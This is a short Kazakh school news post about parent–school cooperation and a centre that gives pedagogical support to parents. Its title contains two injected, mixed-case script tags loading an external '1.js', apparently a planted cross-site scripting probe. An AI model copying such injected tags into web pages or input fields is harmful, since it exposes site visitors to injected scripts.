Ұрпақ тәрбиесінің қайнар бұлағы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
22.11.2024
Ата-ана мен мектептің қарым- қатынасы – ұрпақ тәрбиесінің қайнар бұлағы. Мектептегі тәрбие жұмысының нәтижелігінің бір ұшы ата-аналармен, қоғамдастықпен мектептің бірлескен әрекетінде. Мұғалім мен ата-ананың қарым- қатынасында негізгі рөлді педагог атқарады, өйткені тәрбие жұмысы – оның негізгі мамандығы. Мұғалім ата-аналармен жұмыс істей жүріп, балаға, оның қылықтарына, оқудағы табыстары мен көзқарасына, тағы басқаларға баға беріп отырады. Мектебімізде «Ата-аналарды педагогикалық қолдау» орталығының жұмысы жалғасуда. Педагогикалық қолдау орталығының мақсаты – балалардың әл-ауқатын қамтамасыз етуде мектеп пен ата-аналар арасындағы тиімді өзара іс-қимыл үшін жағдайларды қамтамасыз ету.
Просмотров: 8709